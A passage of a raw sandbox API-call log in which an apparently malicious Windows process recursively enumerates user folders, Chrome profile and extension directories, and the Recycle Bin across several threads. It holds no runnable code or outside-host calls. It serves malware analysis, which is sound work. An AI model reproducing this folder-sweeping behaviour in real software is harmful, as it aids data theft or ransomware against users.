returned 1 [0122.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0x29c020 [0122.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0122.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c2e0 [0122.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0122.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c320 [0122.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c360 [0122.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c3a0 [0122.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x32ae2c8 | out: lpFindFileData=0x32ae2c8) returned 0x29c3e0 [0122.465] FindClose (in: hFindFile=0x29c3e0 | out: hFindFile=0x29c3e0) returned 1 [0122.465] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40700b8 | out: hHeap=0x1db0000) returned 1 [0122.465] FindClose (in: hFindFile=0x29c3a0 | out: hFindFile=0x29c3a0) returned 1 [0122.465] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0122.465] FindClose (in: hFindFile=0x29c360 | out: hFindFile=0x29c360) returned 1 [0122.465] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40500a8 | out: hHeap=0x1db0000) returned 1 [0122.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c360 [0122.466] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c3a0 [0122.466] FindClose (in: hFindFile=0x29c3a0 | out: hFindFile=0x29c3a0) returned 1 [0122.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0122.467] FindClose (in: hFindFile=0x29c360 | out: hFindFile=0x29c360) returned 1 [0122.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40500a8 | out: hHeap=0x1db0000) returned 1 [0122.467] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0122.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40400a0 | out: hHeap=0x1db0000) returned 1 [0122.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0xffffffff [0122.467] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40400a0 | out: hHeap=0x1db0000) returned 1 [0122.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c320 [0122.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c360 [0122.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c3a0 [0122.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x32ae2c8 | out: lpFindFileData=0x32ae2c8) returned 0x29c3e0 [0122.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c420 [0122.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x32addc0 | out: lpFindFileData=0x32addc0) returned 0x29c460 [0122.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x32adb3c | out: lpFindFileData=0x32adb3c) returned 0x29c4a0 [0122.497] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0122.497] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40a00d0 | out: hHeap=0x1db0000) returned 1 [0122.497] FindClose (in: hFindFile=0x29c460 | out: hFindFile=0x29c460) returned 1 [0122.498] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40900c8 | out: hHeap=0x1db0000) returned 1 [0122.498] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0122.498] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40800c0 | out: hHeap=0x1db0000) returned 1 [0122.498] FindClose (in: hFindFile=0x29c3e0 | out: hFindFile=0x29c3e0) returned 1 [0122.498] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40700b8 | out: hHeap=0x1db0000) returned 1 [0122.498] FindClose (in: hFindFile=0x29c3a0 | out: hFindFile=0x29c3a0) returned 1 [0122.498] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0122.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c3a0 [0122.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x32ae2c8 | out: lpFindFileData=0x32ae2c8) returned 0x29c4a0 [0122.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c4e0 [0122.561] FindClose (in: hFindFile=0x29c4e0 | out: hFindFile=0x29c4e0) returned 1 [0122.561] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40a00d0 | out: hHeap=0x1db0000) returned 1 [0122.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c4e0 [0122.598] FindClose (in: hFindFile=0x29c4e0 | out: hFindFile=0x29c4e0) returned 1 [0122.599] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40a00d0 | out: hHeap=0x1db0000) returned 1 [0122.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c4e0 [0122.695] FindClose (in: hFindFile=0x29c4e0 | out: hFindFile=0x29c4e0) returned 1 [0122.695] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40900c8 | out: hHeap=0x1db0000) returned 1 [0122.695] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0122.695] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40700b8 | out: hHeap=0x1db0000) returned 1 [0122.695] FindClose (in: hFindFile=0x29c3a0 | out: hFindFile=0x29c3a0) returned 1 [0122.695] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0122.695] FindClose (in: hFindFile=0x29c360 | out: hFindFile=0x29c360) returned 1 [0122.695] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40500a8 | out: hHeap=0x1db0000) returned 1 [0122.697] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0122.697] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40400a0 | out: hHeap=0x1db0000) returned 1 [0122.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c320 [0122.700] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0122.700] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40900c8 | out: hHeap=0x1db0000) returned 1 [0122.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c320 [0122.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c360 [0122.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x32ae54c | out: lpFindFileData=0x32ae54c) returned 0x29c3a0 [0122.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x32ae2c8 | out: lpFindFileData=0x32ae2c8) returned 0x29c420 [0122.901] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0122.901] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40500a8 | out: hHeap=0x1db0000) returned 1 [0122.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x32ae2c8 | out: lpFindFileData=0x32ae2c8) returned 0x29c420 [0122.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c4a0 [0122.901] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0122.901] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0122.901] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0122.902] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40500a8 | out: hHeap=0x1db0000) returned 1 [0122.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x32ae2c8 | out: lpFindFileData=0x32ae2c8) returned 0x29c1e0 [0123.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c4a0 [0123.333] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0123.333] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0123.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c4a0 [0123.336] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0123.336] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0123.337] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c4a0 [0123.402] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0123.402] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0123.402] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c4a0 [0123.448] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0123.448] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0123.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x32ae044 | out: lpFindFileData=0x32ae044) returned 0x29c560 [0123.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x32addc0 | out: lpFindFileData=0x32addc0) returned 0x29c5a0 [0124.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x32adb3c | out: lpFindFileData=0x32adb3c) returned 0x29c520 [0124.759] FindClose (in: hFindFile=0x29c520 | out: hFindFile=0x29c520) returned 1 [0124.759] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40d00e8 | out: hHeap=0x1db0000) returned 1 [0124.760] FindClose (in: hFindFile=0x29c5a0 | out: hFindFile=0x29c5a0) returned 1 [0124.760] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40c00e0 | out: hHeap=0x1db0000) returned 1 [0124.761] FindClose (in: hFindFile=0x29c560 | out: hFindFile=0x29c560) returned 1 [0124.761] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40600b0 | out: hHeap=0x1db0000) returned 1 [0124.845] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0124.845] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40500a8 | out: hHeap=0x1db0000) returned 1 [0124.846] FindClose (in: hFindFile=0x29c3a0 | out: hFindFile=0x29c3a0) returned 1 [0124.846] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40400a0 | out: hHeap=0x1db0000) returned 1 [0124.846] FindClose (in: hFindFile=0x29c360 | out: hFindFile=0x29c360) returned 1 [0124.846] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40a00d0 | out: hHeap=0x1db0000) returned 1 [0124.847] FindClose (in: hFindFile=0x29c320 | out: hFindFile=0x29c320) returned 1 [0124.847] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40900c8 | out: hHeap=0x1db0000) returned 1 [0124.851] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0124.851] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4030098 | out: hHeap=0x1db0000) returned 1 [0124.851] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0124.852] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0124.853] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0124.853] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0124.853] FindClose (in: hFindFile=0x29c020 | out: hFindFile=0x29c020) returned 1 [0124.853] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0124.854] FindClose (in: hFindFile=0x29bfe0 | out: hFindFile=0x29bfe0) returned 1 [0124.856] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x304bee8 | out: hHeap=0x1db0000) returned 1 [0124.856] SetEvent (hEvent=0x268) returned 1 [0124.856] SetEvent (hEvent=0x264) returned 1 [0124.856] SetEvent (hEvent=0x26c) returned 1 [0124.856] WaitForSingleObject (hHandle=0x26c, dwMilliseconds=0xffffffff) returned 0x0 [0124.856] SetEvent (hEvent=0x268) returned 1 [0124.856] SetEvent (hEvent=0x264) returned 1 [0124.857] SetEvent (hEvent=0x26c) returned 1 [0124.857] WaitForMultipleObjects (nCount=0x2, lpHandles=0x32af968*=0x270, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0124.857] CloseHandle (hObject=0x284) returned 1 [0124.857] CloseHandle (hObject=0x270) returned 1 [0124.857] CloseHandle (hObject=0x264) returned 1 [0124.857] CloseHandle (hObject=0x268) returned 1 [0124.857] CloseHandle (hObject=0x26c) returned 1 [0124.857] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x302bed8 | out: hHeap=0x1db0000) returned 1 [0124.857] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5850 | out: hHeap=0x1db0000) returned 1 [0124.857] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1718 | out: hHeap=0x1db0000) returned 1 [0124.857] SetEvent (hEvent=0x250) returned 1 [0124.858] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016e58 | out: hHeap=0x1db0000) returned 1 [0124.858] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016e70 | out: hHeap=0x1db0000) returned 1 [0124.858] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9650 | out: hHeap=0x1db0000) returned 1 Thread: id = 102 os_tid = 0x788 [0111.512] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x38) returned 0x1db5870 [0111.512] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x18) returned 0x1db58b0 [0111.512] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x274 [0111.512] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x278 [0111.512] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x27c [0111.512] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x303bee0 [0111.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x833957, lpParameter=0x3a0fe60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0111.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x833957, lpParameter=0x3a0fe60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x288 [0111.540] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x307bf00 [0111.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x3a0fbd8 | out: lpFindFileData=0x3a0fbd8) returned 0x29c060 [0111.540] GetLastError () returned 0x0 [0111.540] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x214) returned 0x1db9870 [0111.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0111.541] GetCurrentThreadId () returned 0x788 [0111.541] SetLastError (dwErrCode=0x0) [0111.541] GetLastError () returned 0x0 [0111.541] SetLastError (dwErrCode=0x0) [0111.541] GetLastError () returned 0x0 [0111.541] SetLastError (dwErrCode=0x0) [0111.541] GetLastError () returned 0x0 [0111.541] SetLastError (dwErrCode=0x0) [0111.541] GetLastError () returned 0x0 [0111.541] SetLastError (dwErrCode=0x0) [0111.541] GetLastError () returned 0x0 [0111.541] SetLastError (dwErrCode=0x0) [0111.541] GetLastError () returned 0x0 [0111.541] SetLastError (dwErrCode=0x0) [0111.541] GetLastError () returned 0x0 [0111.542] SetLastError (dwErrCode=0x0) [0111.542] GetLastError () returned 0x0 [0111.542] SetLastError (dwErrCode=0x0) [0111.542] GetLastError () returned 0x0 [0111.542] SetLastError (dwErrCode=0x0) [0111.542] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x308bf08 [0111.542] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0x29c0a0 [0111.542] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.542] FindNextFileW (in: hFindFile=0x29c0a0, lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 1 [0111.542] GetLastError () returned 0x0 [0111.542] SetLastError (dwErrCode=0x0) [0111.542] GetLastError () returned 0x0 [0111.542] SetLastError (dwErrCode=0x0) [0111.542] GetLastError () returned 0x0 [0111.542] SetLastError (dwErrCode=0x0) [0111.542] GetLastError () returned 0x0 [0111.543] SetLastError (dwErrCode=0x0) [0111.543] GetLastError () returned 0x0 [0111.543] SetLastError (dwErrCode=0x0) [0111.543] GetLastError () returned 0x0 [0111.543] SetLastError (dwErrCode=0x0) [0111.543] GetLastError () returned 0x0 [0111.543] SetLastError (dwErrCode=0x0) [0111.543] GetLastError () returned 0x0 [0111.543] SetLastError (dwErrCode=0x0) [0111.543] GetLastError () returned 0x0 [0111.543] SetLastError (dwErrCode=0x0) [0111.543] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x309bf10 [0111.544] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c0e0 [0111.544] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.544] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.544] SetLastError (dwErrCode=0x0) [0111.544] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.545] SetLastError (dwErrCode=0x0) [0111.545] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.546] SetLastError (dwErrCode=0x0) [0111.546] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.547] SetLastError (dwErrCode=0x0) [0111.547] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) [0111.548] GetLastError () returned 0x0 [0111.548] SetLastError (dwErrCode=0x0) 